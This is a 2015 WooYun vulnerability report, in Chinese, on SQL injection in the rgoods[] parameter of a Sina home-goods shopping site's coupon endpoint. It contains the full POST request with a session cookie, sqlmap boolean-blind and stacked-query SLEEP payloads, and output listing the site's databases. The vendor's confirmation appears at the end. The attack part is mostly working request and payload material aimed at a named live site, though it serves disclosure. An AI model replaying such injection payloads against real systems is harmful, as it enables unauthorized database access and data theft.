当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098988

漏洞标题:新浪某业务存在SQL注入

相关厂商:新浪

漏洞作者: 小邪

提交时间:2015-03-03 10:58

修复时间:2015-04-17 11:00

公开时间:2015-04-17 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

新浪某站存在SQL注入#2(具有一定数据量)

详细说明:

问题站点:http://www.jiaju.com
日期 ALEXA 百度来量 收录词数 百度权重 谷歌PR
2015-02-28 - 8361 ~ 10974 5229 6 -
2015-02-27 198907 8841 ~ 10922 5202 6 -
2015-02-26 - 8328 ~ 10930 5205 6 -
2015-02-25 1676007 8291 ~ 11918 5183 6 -
2015-02-24 149624 8831 ~ 11429 5187 6 -
盲注就没具体跑表了 不过看流量感觉数据量应该不小吧
问题处:http://www.jiaju.com/o/trade/coupons/
参数rgoods[]存在注入

POST /o/trade/coupons/ HTTP/1.1
Host: www.jiaju.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
xxxxxxxxxxxxxxx: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.jiaju.com/o/trade/confirm/
Content-Length: 1638
Cookie: WT_FPC=id=2f67543973e507082041425205417918:lv=1425206931655:ss=1425205417918; cookUserNikeName=%E5%B0%8F%E9%82%AA_eval; issetCookUserNikeName=1; LUP=bt%3D1425205494%26email%3D7772733532%2540qq.com%26f%3D1%26loginname%3Dxx%2540jyhack.com%26mobile%3D%26nick%3D%25D0%25A1%25D0%25B0_eval%26nickname%3D%25E5%25B0%258F%25E9%2582%25AA_eval%26uid%3D5518319150%26user%3Dxx%2540jyhack.com%26ut%3D2015-03-01%2B18%253A23%253A35; LUE=f0ba26485d277c59e86cfbf92dad978f; JJU=Dr1cKVTQBQjWLgMq0ZyPzoMUFjtq8Cd4zHdlRaF04%2F%2FGrw9hRDNoNz6fzPo2hAxm5buzNMDFZk28F6YL0MvIbIuDKaBklpU6FAqJq%2BD4H9F88EPsxmgL06VTethZAozY6rR64feDAYY3S%2F06DihXDAzb8JGltOLL9R6Peevf7FbvyPs2jKaoyVikhTg1UtLtFOovtP%2BrJqC3jIEsu0W8GwYhgv9koEhi3IiSgtoIPmXGxEpB23INc%2BjWMS1WopbZMB0N4yjLdkCnqzhr4rVeJfle6SZ54gqRZpSLLGfUvCYwID2owtZ9JYSybsAFlbPHBTSo; jj_goods_history_view=%7B%22333260%22%3A%22bj%2Csh%2Csz%22%7D
X-Forwarded-For: '
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
addr=156107&UserAddress%5Bpro_id%5D=0&UserAddress%5Bcity_id%5D=0&UserAddress%5Bcounty_id%5D=0&UserAddress%5Bzip%5D=&UserAddress%5Baddress%5D=&UserAddress%5Bconsignee%5D=&UserAddress%5Bmobile%5D=&UserAddress%5Btel_tel%5D=&cartIds%5B%5D=0&Order%5B100186%5D%5B%5D=6720864&rgoods%5B%5D=333260&goodsNum%5B%5D=1&orderType%5B%5D=1&city_id%5B%5D=140424&goods2city_id%5B%5D=6720867&messagebox%5B100186%5D=%E9%80%89%E5%A1%AB%EF%BC%8C%E5%8F%AF%E4%BB%A5%E5%91%8A%E8%AF%89%E5%95%86%E5%AE%B6%E6%82%A8%E5%AF%B9%E5%95%86%E5%93%81%E7%9A%84%E7%89%B9%E6%AE%8A%E8%A6%81%E6%B1%82%EF%BC%8C%E5%A6%82%E9%A2%9C%E8%89%B2%E3%80%81%E5%B0%BA%E7%A0%81%E7%AD%89&shop_ac_100186=0&delsGoods=&rinvoice=on&invoice=%E4%B8%AA%E4%BA%BA&PayInfo%5Btotal_fee%5D=178.00&app_data=a%253A13%253A%257Bs%253A6%253A%2522shopId%2522%253Bs%253A6%253A%2522100186%2522%253Bs%253A7%253A%2522goodsId%2522%253Bs%253A6%253A%2522333260%2522%253Bs%253A6%253A%2522cityId%2522%253Bs%253A4%253A%25221100%2522%253Bs%253A9%253A%2522buyNumber%2522%253Bs%253A1%253A%25221%2522%253Bs%253A9%253A%2522promoType%2522%253Bs%253A1%253A%25220%2522%253Bs%253A12%253A%2522goods2cityId%2522%253Bs%253A7%253A%25226720864%2522%253Bs%253A7%253A%2522payType%2522%253Bs%253A1%253A%25221%2522%253Bs%253A8%253A%2522app_type%2522%253Bs%253A1%253A%25225%2522%253Bs%253A6%253A%2522app_id%2522%253Bs%253A3%253A%2522110%2522%253Bs%253A10%253A%2522user_limit%2522%253Bs%253A5%253A%252210000%2522%253Bs%253A15%253A%2522goodstuan_limit%2522%253Bs%253A5%253A%252210000%2522%253Bs%253A5%253A%2522ccode%2522%253Bs%253A0%253A%2522%2522%253Bs%253A5%253A%2522pcode%2522%253Bs%253A0%253A%2522%2522%253B%257D&confirm_action_from=product

漏洞证明:

Place: POST
Parameter: rgoods[]
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addr=156107&UserAddress[pro_id]=0&UserAddress[city_id]=0&UserAddres
s[county_id]=0&UserAddress[zip]=&UserAddress[address]=&UserAddress[consignee]=&U
serAddress[mobile]=&UserAddress[tel_tel]=&cartIds[]=0&Order[100186][]=6720864&rg
oods[]=333260 AND 1929=1929&goodsNum[]=1&orderType[]=1&city_id[]=140424&goods2ci
ty_id[]=6720867&messagebox[100186]=%E9%80%89%E5%A1%AB%EF%BC%8C%E5%8F%AF%E4%BB%A5
%E5%91%8A%E8%AF%89%E5%95%86%E5%AE%B6%E6%82%A8%E5%AF%B9%E5%95%86%E5%93%81%E7%9A%8
4%E7%89%B9%E6%AE%8A%E8%A6%81%E6%B1%82%EF%BC%8C%E5%A6%82%E9%A2%9C%E8%89%B2%E3%80%
81%E5%B0%BA%E7%A0%81%E7%AD%89&shop_ac_100186=0&delsGoods=&rinvoice=on&invoice=%E
4%B8%AA%E4%BA%BA&PayInfo[total_fee]=178.00&app_data=a%3A13%3A%7Bs%3A6%3A%22shopI
d%22%3Bs%3A6%3A%22100186%22%3Bs%3A7%3A%22goodsId%22%3Bs%3A6%3A%22333260%22%3Bs%3
A6%3A%22cityId%22%3Bs%3A4%3A%221100%22%3Bs%3A9%3A%22buyNumber%22%3Bs%3A1%3A%221%
22%3Bs%3A9%3A%22promoType%22%3Bs%3A1%3A%220%22%3Bs%3A12%3A%22goods2cityId%22%3Bs
%3A7%3A%226720864%22%3Bs%3A7%3A%22payType%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22app_
type%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22app_id%22%3Bs%3A3%3A%22110%22%3Bs%3A10%3A
%22user_limit%22%3Bs%3A5%3A%2210000%22%3Bs%3A15%3A%22goodstuan_limit%22%3Bs%3A5%
3A%2210000%22%3Bs%3A5%3A%22ccode%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22pcode%22%3Bs%3
A0%3A%22%22%3B%7D&confirm_action_from=product
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: addr=156107&UserAddress[pro_id]=0&UserAddress[city_id]=0&UserAddres
s[county_id]=0&UserAddress[zip]=&UserAddress[address]=&UserAddress[consignee]=&U
serAddress[mobile]=&UserAddress[tel_tel]=&cartIds[]=0&Order[100186][]=6720864&rg
oods[]=333260; SELECT SLEEP(5)-- &goodsNum[]=1&orderType[]=1&city_id[]=140424&go
ods2city_id[]=6720867&messagebox[100186]=%E9%80%89%E5%A1%AB%EF%BC%8C%E5%8F%AF%E4
%BB%A5%E5%91%8A%E8%AF%89%E5%95%86%E5%AE%B6%E6%82%A8%E5%AF%B9%E5%95%86%E5%93%81%E
7%9A%84%E7%89%B9%E6%AE%8A%E8%A6%81%E6%B1%82%EF%BC%8C%E5%A6%82%E9%A2%9C%E8%89%B2%
E3%80%81%E5%B0%BA%E7%A0%81%E7%AD%89&shop_ac_100186=0&delsGoods=&rinvoice=on&invo
ice=%E4%B8%AA%E4%BA%BA&PayInfo[total_fee]=178.00&app_data=a%3A13%3A%7Bs%3A6%3A%2
2shopId%22%3Bs%3A6%3A%22100186%22%3Bs%3A7%3A%22goodsId%22%3Bs%3A6%3A%22333260%22
%3Bs%3A6%3A%22cityId%22%3Bs%3A4%3A%221100%22%3Bs%3A9%3A%22buyNumber%22%3Bs%3A1%3
A%221%22%3Bs%3A9%3A%22promoType%22%3Bs%3A1%3A%220%22%3Bs%3A12%3A%22goods2cityId%
22%3Bs%3A7%3A%226720864%22%3Bs%3A7%3A%22payType%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%
22app_type%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22app_id%22%3Bs%3A3%3A%22110%22%3Bs%3
A10%3A%22user_limit%22%3Bs%3A5%3A%2210000%22%3Bs%3A15%3A%22goodstuan_limit%22%3B
s%3A5%3A%2210000%22%3Bs%3A5%3A%22ccode%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22pcode%22
%3Bs%3A0%3A%22%22%3B%7D&confirm_action_from=product
---
[21:03:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[21:03:40] [INFO] fetching database names
[21:03:40] [INFO] fetching number of databases
[21:03:40] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[21:03:40] [INFO] retrieved: 3
[21:03:43] [INFO] retrieved: information_schema
[21:05:17] [INFO] retrieved: mall_jiaju_sina_com_cn
[21:07:10] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] mall_jiaju_sina_com_cn
[*] test

修复方案:

RT

版权声明:转载请注明来源 小邪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-03-04 18:07

厂商回复:

感谢支持,已经通知第三方合作业务进行修复

最新状态:

暂无


漏洞评价:

评论